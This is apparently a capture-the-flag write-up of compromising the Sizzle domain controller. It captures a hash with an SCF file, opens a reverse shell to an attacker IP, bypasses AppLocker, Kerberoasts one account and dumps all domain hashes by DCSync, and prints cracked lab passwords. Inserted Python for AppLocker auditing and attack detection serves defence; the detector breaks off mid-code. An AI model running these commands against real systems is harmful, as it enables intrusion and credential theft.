Enumeration
We start by scanning the machine's ports with nmap, which finds several open ports, among them 80, running an HTTP service.
❯ nmap 10.10.10.103
Nmap scan report for 10.10.10.103
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
5986/tcp open wsmans
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49688/tcp open unknown
49689/tcp open unknown
49692/tcp open unknown
49695/tcp open unknown
49700/tcp open unknown
49713/tcp open unknown
With crackmapexec we can get information about the machine, such as the domain, htb.local, and the machine name, SIZZLE.
❯ crackmapexec smb 10.10.10.103
SMB 10.10.10.103 445 SIZZLE [*] Windows 10.0 Build 14393 x64 (name:SIZZLE) (domain:HTB.LOCAL) (signing:True) (SMBv1:False)
For possible later attacks, or simply for convenience, we add the domain to /etc/hosts, along with the machine name SIZZLE as another hostname.
❯ echo "10.10.10.103 htb.local sizzle.htb.local" | sudo tee -a /etc/hosts
The FTP service is open and accepts the default anonymous login; however, we find nothing interesting in it.
❯ ftp htb.local
Connected to htb.local.
220 Microsoft FTP Service
Name (htb.local:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||54665|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>
The main web page doesn't give us anything either; it is just a gif without much meaning.
Enumerating SMB shares from a null session, we have READ privileges on the Department Shares share, which is not a default share.
❯ crackmapexec smb htb.local -u null -p '' --shares
SMB htb.local 445 SIZZLE [*] Windows 10.0 Build 14393 x64 (name:SIZZLE) (domain:HTB.LOCAL) (signing:True) (SMBv1:False)
SMB htb.local 445 SIZZLE [+] HTB.LOCAL\null:
SMB htb.local 445 SIZZLE [+] Enumerated shares
SMB htb.local 445 SIZZLE Share Permissions Remark
SMB htb.local 445 SIZZLE ----- ----------- ------
SMB htb.local 445 SIZZLE ADMIN$ Remote Admin
SMB htb.local 445 SIZZLE C$ Default share
SMB htb.local 445 SIZZLE CertEnroll Active Directory Certificate Services share
SMB htb.local 445 SIZZLE Department Shares READ
SMB htb.local 445 SIZZLE IPC$ READ Remote IPC
SMB htb.local 445 SIZZLE NETLOGON Logon server share
SMB htb.local 445 SIZZLE Operations
SMB htb.local 445 SIZZLE SYSVOL Logon server share
We can connect with smbclient, and inside we find several directories.
❯ impacket-smbclient htb.local/null@sizzle.htb.local -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# use Department Shares
# ls
drw-rw-rw- 0 Tue Jul 3 10:22:32 2018 .
drw-rw-rw- 0 Tue Jul 3 10:22:32 2018 ..
drw-rw-rw- 0 Mon Jul 2 14:21:43 2018 Accounting
drw-rw-rw- 0 Mon Jul 2 14:14:28 2018 Audit
drw-rw-rw- 0 Tue Jul 3 10:22:39 2018 Banking
drw-rw-rw- 0 Mon Jul 2 14:15:01 2018 CEO_protected
drw-rw-rw- 0 Mon Jul 2 14:22:06 2018 Devops
drw-rw-rw- 0 Mon Jul 2 14:11:57 2018 Finance
drw-rw-rw- 0 Mon Jul 2 14:16:11 2018 HR
drw-rw-rw- 0 Mon Jul 2 14:14:24 2018 Infosec
drw-rw-rw- 0 Mon Jul 2 14:13:59 2018 Infrastructure
drw-rw-rw- 0 Mon Jul 2 14:12:04 2018 IT
drw-rw-rw- 0 Mon Jul 2 14:12:09 2018 Legal
drw-rw-rw- 0 Mon Jul 2 14:15:25 2018 M&A
drw-rw-rw- 0 Mon Jul 2 14:14:43 2018 Marketing
drw-rw-rw- 0 Mon Jul 2 14:11:47 2018 R&D
drw-rw-rw- 0 Mon Jul 2 14:14:37 2018 Sales
drw-rw-rw- 0 Mon Jul 2 14:21:46 2018 Security
drw-rw-rw- 0 Mon Jul 2 14:16:54 2018 Tax
drw-rw-rw- 0 Tue Jul 10 16:39:32 2018 Users
drw-rw-rw- 0 Mon Jul 2 14:32:58 2018 ZZ_ARCHIVE
#
Inside the ZZ_ARCHIVE directory we find many files with different extensions; we can download them all with mget to analyse them later.
# cd ZZ_ARCHIVE
# mget *
[*] Downloading AddComplete.pptx
[*] Downloading AddMerge.ram
[*] Downloading ConfirmUnprotect.doc
[*] Downloading ConvertFromInvoke.mov
[*] Downloading ConvertJoin.docx
[*] Downloading CopyPublish.ogg
[*] Downloading DebugMove.mpg
[*] Downloading DebugSelect.mpg
[*] Downloading DebugUse.pptx
[*] Downloading DisconnectApprove.ogg
[*] Downloading DisconnectDebug.mpeg2
[*] Downloading EditCompress.xls
.....................................
[*] Downloading ResumeCompare.doc
[*] Downloading SelectPop.ogg
[*] Downloading SuspendWatch.mp4
[*] Downloading SwitchConvertFrom.mpg
[*] Downloading UndoPing.rm
[*] Downloading UninstallExpand.mp3
[*] Downloading UnpublishSplit.ppt
[*] Downloading UnregisterPing.pptx
[*] Downloading UpdateRead.mpeg
[*] Downloading WaitRevoke.pptx
[*] Downloading WriteUninstall.mp3
#
They really don't give us anything: if we inspect a file, every byte is 00, and the md5 hash of every file is the same, so they are just null bytes.
❯ xxd WriteUninstall.mp3 | head -n1
00000000: 0000 0000 0000 0000 0000 0000 0000 0000 ................
❯ md5sum *
6fa74ff6dd88878b4b56092a950035f8 AddComplete.pptx
6fa74ff6dd88878b4b56092a950035f8 AddMerge.ram
6fa74ff6dd88878b4b56092a950035f8 ConfirmUnprotect.doc
6fa74ff6dd88878b4b56092a950035f8 ConvertFromInvoke.mov
6fa74ff6dd88878b4b56092a950035f8 ConvertJoin.docx
6fa74ff6dd88878b4b56092a950035f8 CopyPublish.ogg
6fa74ff6dd88878b4b56092a950035f8 DebugMove.mpg
6fa74ff6dd88878b4b56092a950035f8 DebugSelect.mpg
6fa74ff6dd88878b4b56092a950035f8 DebugUse.pptx
6fa74ff6dd88878b4b56092a950035f8 DisconnectApprove.ogg
6fa74ff6dd88878b4b56092a950035f8 DisconnectDebug.mpeg2
6fa74ff6dd88878b4b56092a950035f8 EditCompress.xls
.......................................................
Access - amanda
In the Users directory we find different users, probably accounts on the system.
# cd Users
# ls
drw-rw-rw- 0 Tue Jul 10 16:39:32 2018 .
drw-rw-rw- 0 Tue Jul 10 16:39:32 2018 ..
drw-rw-rw- 0 Mon Jul 2 14:18:43 2018 amanda
drw-rw-rw- 0 Mon Jul 2 14:19:06 2018 amanda_adm
drw-rw-rw- 0 Mon Jul 2 14:18:28 2018 bill
drw-rw-rw- 0 Mon Jul 2 14:18:31 2018 bob
drw-rw-rw- 0 Mon Jul 2 14:19:14 2018 chris
drw-rw-rw- 0 Mon Jul 2 14:18:39 2018 henry
drw-rw-rw- 0 Mon Jul 2 14:18:34 2018 joe
drw-rw-rw- 0 Mon Jul 2 14:18:53 2018 jose
drw-rw-rw- 0 Tue Jul 10 16:39:32 2018 lkys37en
drw-rw-rw- 0 Mon Jul 2 14:18:48 2018 morgan
drw-rw-rw- 0 Mon Jul 2 14:19:20 2018 mrb3n
drw-rw-rw- 0 Wed Sep 26 00:45:32 2018 Public
#
With smbcacls we can see the exact privileges we have on each folder of the share; specifically we are interested in the Everyone entry, since those are the privileges we hold from the null session in our current context.
❯ smbcacls -N "//hackthebox.local/Department Shares" "Users/amanda"
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
With a loop iterating over each user directory we can check the privileges of Everyone; in the Public folder we have FULL privilege.
❯ for user in $(cat users.txt); do echo -n "Users/$user: "; smbcacls -N "//hackthebox.local/Department Shares" "Users/$user" | grep Everyone; done
Users/amanda: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/amanda_adm: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/bill: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/bob: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/chris: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/henry: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/joe: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/jose: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/lkys37en: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/morgan: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/mrb3n: ACL:Everyone:ALLOWED/OI|CI|I/READ
Users/Public: ACL:Everyone:ALLOWED/OI|CI/FULL
A possible attack, as in Driver, is to upload an scf file so that when a user tries to view its icon it is loaded from an external SMB share that we create.
[Shell]
IconFile=\\10.10.14.10\kali\pwned.ico
We simply connect with smbclient and upload the scf to the Public directory.
❯ impacket-smbclient htb.local/null@sizzle.htb.local -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# use Department Shares
# cd Users\Public
# put file.scf
#
After a few seconds we receive an NTLMv2 hash belonging to amanda.
❯ impacket-smbserver kali . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.103,53037)
[*] AUTHENTICATE_MESSAGE (HTB\amanda,SIZZLE)
[*] User SIZZLE\amanda authenticated successfully
[*] amanda::HTB:aaaaaaaaaaaaaaaa:cdc61f6dec08fc4c6b29cbd23c0ef801:0101000000000000808f118b18d3d9011528d60c45e443e000000000010010004d006b006b0063004700490041007400030010004d006b006b00630047004900410074000200100043005900660063006200710079004200040010004300590066006300620071007900420007000800808f118b18d3d9010600040002000000080030003000000000000000010000000020000044545fcb6ad84fa298ce8e914d1f888b0021bae9cdd79032f9f3221b5963c43d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003600000000000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:kali)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:kali)
[*] Closing down connection (10.10.10.103,53037)
[*] Remaining connections []
The password is weak, so we can crack it easily with john.
❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
Ashare1972 (amanda)
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
We verify amanda's password over SMB with crackmapexec and it reports it as valid; we now have domain-level credentials.
❯ crackmapexec smb htb.local -u amanda -p Ashare1972
SMB htb.local 445 SIZZLE [*] Windows 10.0 Build 14393 x64 (name:SIZZLE) (domain:HTB.LOCAL) (signing:True) (SMBv1:False)
SMB htb.local 445 SIZZLE [+] HTB.LOCAL\amanda:Ashare1972
Shell - amanda
When we try to authenticate to winrm we get an error, but it is not an authentication error: the server does not respond with NTLM or Kerberos.
❯ crackmapexec winrm htb.local -u amanda -p Ashare1972
SMB htb.local 5986 SIZZLE [*] Windows 10.0 Build 14393 (name:SIZZLE) (domain:HTB.LOCAL)
HTTP htb.local 5986 SIZZLE [*] https://hackthebox.local:5986/wsman
WINRM htb.local 5986 SIZZLE [-] HTB.LOCAL\amanda:Ashare1972 "The server did not response with one of the following authentication methods Negotiate, Kerberos, NTLM - actual: ''"
What we can do is authenticate with a certificate and a key. To do so we start by obtaining a pfx with certipy, but first we need to know the CA.
❯ certipy find -target htb.local -u amanda -p Ashare1972
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'HTB-SIZZLE-CA' via CSRA
[*] Trying to get CA configuration for 'HTB-SIZZLE-CA' via RRP
[*] Got CA configuration for 'HTB-SIZZLE-CA'
[-] Got error: module 'enum' has no attribute '_decompose'
[-] Use -debug to print a stacktrace
With the CA known, we obtain the pfx as amanda and extract the crt and the key from it.
❯ certipy req -target htb.local -u amanda -p Ashare1972 -ca HTB-SIZZLE-CA
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 23
[*] Got certificate with UPN 'amanda@HTB.LOCAL'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'amanda.pfx'
❯ certipy cert -pfx amanda.pfx -nokey -out amanda.crt
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Writing certificate and to 'amanda.crt'
❯ certipy cert -pfx amanda.pfx -nocert -out amanda.key
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Writing private key to 'amanda.key'
With the .crt and .key that certipy generated for amanda we can connect with evil-winrm over SSL and get a PowerShell as amanda.
❯ evil-winrm -S -i htb.local -c amanda.crt -k amanda.key
PS C:\Users\amanda\Documents> whoami
htb\amanda
PS C:\Users\amanda\Documents>
Shell - mrlky
If we try to import the SharpHound module with Import-Module we get an error saying that scripts cannot be imported in this language mode.
PS C:\Users\amanda\Documents> curl 10.10.14.10/SharpHound.ps1 -o SharpHound.ps1
PS C:\Users\amanda\Documents> Import-Module .\SharpHound.ps1
Importing *.ps1 files as modules is not allowed in ConstrainedLanguage mode.
At line:1 char:1
+ Import-Module .\SharpHound.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (:) [Import-Module], InvalidOperationException
+ FullyQualifiedErrorId : Modules_ImportPSFileNotAllowedInConstrainedLanguage,Microsoft.PowerShell.Commands.ImportModuleCommand
PS C:\Users\amanda\Documents>
This is due to our execution context: the language mode is ConstrainedLanguage, which means we are restricted in several ways.
PS C:\Users\amanda\Documents> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
PS C:\Users\amanda\Documents>
To bypass this we can use PSByPassCLM, which has a function to establish a reverse shell with a PowerShell that is not in ConstrainedLanguage mode.
PS C:\Users\amanda\Documents> curl 10.10.14.10/PsBypassCLM.exe -o PsBypassCLM.exe
PS C:\Users\amanda\Documents> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U /revshell=true /rhost=10.10.14.10 /rport=443 C:\Users\amanda\Documents\PsBypassCLM.exe
Microsoft (R) .NET Framework Installation utility Version 4.6.1586.0
Copyright (C) Microsoft Corporation. All rights reserved.
The uninstall is beginning.
See the contents of the log file for the C:\Users\amanda\Documents\PsBypassCLM.exe assembly's progress.
The file is located at .
Uninstalling assembly 'C:\Users\amanda\Documents\PsBypassCLM.exe'.
Affected parameters are:
assemblypath = C:\Users\amanda\Documents\PsBypassCLM.exe
rport = 443
revshell = true
rhost = 10.10.14.10
logtoconsole = true
logfile =
Trying to connect back...
PS C:\Users\amanda\Documents>
After running it we receive a PowerShell on our listener, still as amanda but this time without the limitation, since we have FullLanguage.
❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.10.103
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\amanda\Documents> whoami
htb\amanda
PS C:\Users\amanda\Documents> $ExecutionContext.SessionState.LanguageMode
FullLanguage
PS C:\Users\amanda\Documents>
Now we can import the SharpHound module and invoke it to collect information about the domain; it saves the information in a zip.
PS C:\Users\amanda\Documents> Import-Module .\SharpHound.ps1
PS C:\Users\amanda\Documents> Invoke-BloodHound -CollectionMethod All
PS C:\Users\amanda\Documents> dir
Directory: C:\Users\amanda\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/20/2023 1:18 AM 12276 20230820011815_BloodHound.zip
-a---- 8/20/2023 1:18 AM 1391869 SharpHound.ps1
PS C:\Users\amanda\Documents>
After uploading the zip to BloodHound we have several queries available; listing the kerberoastable users we find mrlky.
We have another limitation: although the Kerberos port, 88, is open, we cannot reach it from outside, and we need it to move forward.
PS C:\Users\amanda\Documents> netstat -oat
Active Connections
Proto Local Address Foreign Address State PID Offload State
TCP 0.0.0.0:21 sizzle:0 LISTENING 2452 InHost
TCP 0.0.0.0:80 sizzle:0 LISTENING 4 InHost
TCP 0.0.0.0:88 sizzle:0 LISTENING 628 InHost
TCP 0.0.0.0:135 sizzle:0 LISTENING 856 InHost
TCP 0.0.0.0:389 sizzle:0 LISTENING 628 InHost
TCP 0.0.0.0:443 sizzle:0 LISTENING 4 InHost
TCP 0.0.0.0:445 sizzle:0 LISTENING 4 InHost
TCP 0.0.0.0:464 sizzle:0 LISTENING 628 InHost
TCP 0.0.0.0:593 sizzle:0 LISTENING 856 InHost
TCP 0.0.0.0:636 sizzle:0 LISTENING 628 InHost
TCP 0.0.0.0:3268 sizzle:0 LISTENING 628 InHost
TCP 0.0.0.0:3269 sizzle:0 LISTENING 628 InHost
TCP 0.0.0.0:5985 sizzle:0 LISTENING 4 InHost
TCP 0.0.0.0:5986 sizzle:0 LISTENING 4 InHost
TCP 0.0.0.0:9389 sizzle:0 LISTENING 2412 InHost
.............................................................................................
PS C:\Users\amanda\Documents>
We can think about creating a socks5 tunnel with chisel, but when we try to run it we hit another limitation: by policy we cannot execute exe files.
PS C:\Users\amanda\Documents> curl 10.10.14.10/chisel.exe -o chisel.exe
PS C:\Users\amanda\Documents> .\chisel.exe client 10.10.14.10:9999 R:socks
Program 'chisel.exe' failed to run: This program is blocked by group policy. For more information, contact your system administratorAt line:1 char:1
+ .\chisel.exe client 10.10.14.10:9999 R:socks
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\chisel.exe client 10.10.14.10:9999 R:socks
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
PS C:\Users\amanda\Documents>
Reviewing the policies we see a rule stating that all executables located under C:\Windows can be run by any user.
PS C:\Users\amanda\Documents> Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections
PublisherConditions : {*\*\*,0.0.0.0-*}
PublisherExceptions : {}
PathExceptions : {}
HashExceptions : {}
Id : a9e18c21-ff8f-43cf-b9fc-db40eed693ba
Name : (Default Rule) All signed packaged apps
Description : Allows members of the Everyone group to run packaged apps that are signed.
UserOrGroupSid : S-1-1-0
Action : Allow
PathConditions : {%WINDIR%\*}
PathExceptions : {}
PublisherExceptions : {}
HashExceptions : {}
Id : a61c8b2c-a319-4cd0-9690-d2177cad7b51
Name : (Default Rule) All files located in the Windows folder
Description : Allows members of the Everyone group to run applications that are located in the Windows folder.
UserOrGroupSid : S-1-1-0
Action : Allow
PathConditions : {%OSDRIVE%\tmp\*}
PathExceptions : {}
PublisherExceptions : {}
HashExceptions : {}
Id : d754b869-d2cc-46af-9c94-6b6e8c10d095
Name : All files located in the Program Files folder
Description : Allows members of the Everyone group to run applications that are located in the Program Files folder.
UserOrGroupSid : S-1-1-0
Action : Allow
PS C:\Users\amanda\Documents>
We can simply download chisel.exe again into C:\Windows\Temp; since that satisfies the rule, we can run it to create the socks5 tunnel.
PS C:\Windows\Temp> curl 10.10.14.10/chisel.exe -o chisel.exe
PS C:\Windows\Temp> .\chisel.exe client 10.10.14.10:9999 R:socks
❯ chisel server --reverse --port 9999
server: Reverse tunnelling enabled
server: Listening on http://0.0.0.0:9999
server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
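The rule that let chisel run is the stock AppLocker default, and the writeup shows exactly why it is weak: %WINDIR%\* also covers folders a standard user can write to, such as C:\Windows\Temp. The following Python is an added example, not from the writeup: it parses an AppLocker policy in the XML form Get-AppLockerPolicy exports (constructed here to mirror the two Exe path rules listed above), flags Allow rules that cover writable folders without an exception, and shows that an exception for %WINDIR%\Temp\* clears that finding; the variable expansions and the writable-folder list are assumptions.

```python
import xml.etree.ElementTree as ET
from fnmatch import fnmatchcase

# Constructed effective-policy XML mirroring the two Exe path rules from the
# Get-AppLockerPolicy output above (ids, names and paths taken from that output).
POLICY_XML = r"""<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="a61c8b2c-a319-4cd0-9690-d2177cad7b51"
                  Name="(Default Rule) All files located in the Windows folder"
                  UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*"/></Conditions>
    </FilePathRule>
    <FilePathRule Id="d754b869-d2cc-46af-9c94-6b6e8c10d095"
                  Name="All files located in the Program Files folder"
                  UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%OSDRIVE%\tmp\*"/></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>"""

# AppLocker path variables expanded to their usual values (assumed defaults).
VARIABLES = {"%WINDIR%": r"C:\Windows", "%SYSTEM32%": r"C:\Windows\System32",
             "%OSDRIVE%": "C:", "%PROGRAMFILES%": r"C:\Program Files"}

# Folders under the Windows directory that standard users can normally write to.
# Representative list assumed for this example; Temp is the one used in the writeup.
WRITABLE_DIRS = [r"C:\Windows\Temp", r"C:\Windows\Tasks", r"C:\Windows\Tracing"]


def expand(rule_path: str) -> str:
    for var, value in VARIABLES.items():
        rule_path = rule_path.replace(var, value)
    return rule_path.lower()


def path_matches(rule_path: str, probe: str) -> bool:
    # AppLocker path conditions are case-insensitive globs and '*' spans subfolders
    return fnmatchcase(probe.lower(), expand(rule_path))


def audit_policy(xml_text: str, writable_dirs=WRITABLE_DIRS) -> list:
    """Return (rule name, rule path, writable dir) for each Allow path rule in the
    Exe collection that covers a user-writable folder with no exception for it."""
    findings = []
    root = ET.fromstring(xml_text)
    for coll in root.iter("RuleCollection"):
        if coll.get("Type") != "Exe":
            continue
        for rule in coll.iter("FilePathRule"):
            if rule.get("Action") != "Allow":
                continue
            conds = [c.get("Path") for c in rule.find("Conditions").iter("FilePathCondition")]
            exc_el = rule.find("Exceptions")
            excs = [] if exc_el is None else [c.get("Path") for c in exc_el.iter("FilePathCondition")]
            for folder in writable_dirs:
                probe = folder + r"\probe.exe"   # any executable dropped into that folder
                allowed = any(path_matches(p, probe) for p in conds)
                excepted = any(path_matches(e, probe) for e in excs)
                if allowed and not excepted:
                    findings.append((rule.get("Name"), conds[0], folder))
    return findings


def add_exception(xml_text: str, rule_id: str, exception_path: str) -> str:
    """Hardening step: add a path exception to one rule and return the new XML."""
    root = ET.fromstring(xml_text)
    for rule in root.iter("FilePathRule"):
        if rule.get("Id") == rule_id:
            exc_el = rule.find("Exceptions")
            if exc_el is None:
                exc_el = ET.SubElement(rule, "Exceptions")
            ET.SubElement(exc_el, "FilePathCondition", Path=exception_path)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for name, path, folder in audit_policy(POLICY_XML):
        print(f"[!] '{name}' ({path}) lets anything in {folder} run")
    fixed = add_exception(POLICY_XML, "a61c8b2c-a319-4cd0-9690-d2177cad7b51", r"%WINDIR%\Temp\*")
    print(f"after exception: {len(audit_policy(fixed))} finding(s) remain")
```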
Going through the tunnel with proxychains we can use GetUserSPNs to take advantage of what we saw in BloodHound and obtain mrlky's hash.
❯ proxychains -q impacket-GetUserSPNs htb.local/amanda:Ashare1972 -request
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ----- ----------------------------------------------------- -------------------------- -------------------------- ----------
http/sizzle mrlky CN=Remote Management Users,CN=Builtin,DC=HTB,DC=LOCAL 2018-07-10 13:08:09.536421 2018-07-12 09:23:50.871575
$krb5tgs$23$*mrlky$HTB.LOCAL$htb.local/mrlky*$2eedace6780d18a7ccb1f15d82d1a2af$.....
The hash we obtained is quite weak and we crack it easily with john.
❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Press 'q' or Ctrl-C to abort, almost any other key for status
Football#7 (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We check the password with crackmapexec and it reports it as valid.
❯ crackmapexec smb htb.local -u mrlky -p Football#7
SMB htb.local 445 SIZZLE [*] Windows 10.0 Build 14393 x64 (name:SIZZLE) (domain:HTB.LOCAL) (signing:True) (SMBv1:False)
SMB htb.local 445 SIZZLE [+] HTB.LOCAL\mrlky:Football#7
We repeat the process of creating the certificate with certipy, this time with mrlky's credentials, and with the new crt and key we connect to winrm.
❯ certipy req -target htb.local -u mrlky -p Football#7 -ca HTB-SIZZLE-CA
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 23
[*] Got certificate with UPN 'mrlky@HTB.LOCAL'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'mrlky.pfx'
❯ certipy cert -pfx mrlky.pfx -nokey -out mrlky.crt
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Writing certificate and to 'mrlky.crt'
❯ certipy cert -pfx mrlky.pfx -nocert -out mrlky.key
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Writing private key to 'mrlky.key'
❯ evil-winrm -S -i htb.local -c mrlky.crt -k mrlky.key
PS C:\Users\mrlky\Documents> whoami
htb\amanda
PS C:\Users\mrlky\Documents> type ..\Desktop\user.txt
454**************************593
PS C:\Users\mrlky\Documents>
Shell - Administrator
Going back to BloodHound we find that the user mrlky has DCSync privileges over the domain, so we can dump the hashes from ntds.dit.
To exploit this we can simply use crackmapexec with --ntds and drsuapi as the method; this way we obtain all the NT hashes of the domain.
❯ crackmapexec smb htb.local -u mrlky -p Football#7 --ntds drsuapi
SMB htb.local 445 SIZZLE [*] Windows 10.0 Build 14393 x64 (name:SIZZLE) (domain:HTB.LOCAL) (signing:True) (SMBv1:False)
SMB htb.local 445 SIZZLE [+] HTB.LOCAL\mrlky:Football#7
SMB htb.local 445 SIZZLE [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB htb.local 445 SIZZLE [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB htb.local 445 SIZZLE Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
SMB htb.local 445 SIZZLE Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB htb.local 445 SIZZLE krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
SMB htb.local 445 SIZZLE DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB htb.local 445 SIZZLE amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
SMB htb.local 445 SIZZLE mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
SMB htb.local 445 SIZZLE sizzler:1604:aad3b435b51404eeaad3b435b51404ee:d79f820afad0cbc828d79e16a6f890de:::
SMB htb.local 445 SIZZLE SIZZLE$:1001:aad3b435b51404eeaad3b435b51404ee:73d400aa1750745557a5785eac8301a0:::
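Both the Kerberoast step and the DCSync step above leave distinct traces on the domain controller: the GetUserSPNs request shows up as a 4769 service-ticket event with RC4 (etype 0x17, the krb5tgs$23 format john loaded) for a user account's SPN, and the drsuapi dump as a 4662 directory-service access exercising the replication control-access rights. The triage logic below is an added example, not part of the writeup; the events are constructed and simplified (field names follow the Security log, but they are not real exports) and the allow-list of accounts expected to replicate is an assumption.

```python
import re

# Control-access rights on the domain object that a DCSync needs (MS-ADTS GUIDs)
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
RC4_HMAC = "0x17"   # etype 23, the krb5tgs$23 format shown above
# Accounts expected to replicate: the DC's own machine account here (assumed allow-list)
REPLICATION_ALLOWED = {"SIZZLE$"}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")

# Constructed, simplified events; the last GUID is a placeholder, not a real right
EVENTS = [
    {"EventID": 4769, "TargetUserName": "amanda@HTB.LOCAL", "ServiceName": "mrlky",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.10.103", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "amanda@HTB.LOCAL", "ServiceName": "SIZZLE$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.103", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "amanda@HTB.LOCAL", "ServiceName": "mrlky",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.103", "Status": "0x0"},
    {"EventID": 4662, "SubjectUserName": "mrlky", "SubjectDomainName": "HTB", "AccessMask": "0x100",
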